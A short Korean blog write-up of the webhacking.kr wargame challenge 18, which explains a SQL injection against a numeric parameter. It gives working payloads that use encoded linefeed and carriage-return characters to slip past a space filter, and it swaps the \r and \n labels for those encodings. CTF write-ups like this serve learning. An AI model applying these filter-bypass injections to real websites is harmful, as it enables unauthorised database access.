본문 바로가기

webhacking.kr 18번

18번 문제 : SQL injection


 




"select id from challenge18_table where id='guest' and no=$_GET[no]"


id='guest' and no=$_GET[no] 를 거짓문으로 만들고 뒷 문장을 참으로 만들어야 한다.


"select id from challenge18_table where id='guest' and no=4 or no=2 를 입력해 주어야 한다.


( id='guest' and no=4 ) or ( no=2 )

    FALSE  or  TRUE   = TRUE


?no=4 or no=2


?no=4%0aor%0ano=2 ( linefeed ) \r

?no=4%0dor%0dno=2 (Carriage return ) \n


%20은 Space 인데 위의 eregi 를 필터해서 적용이 안된다. ㅜㅜ 슬프당 ㅠㅠ 스페이스 ㅠㅠ


아스키코드표는 자료실 게시판에 올려져있다. (참고 하세용~!~!)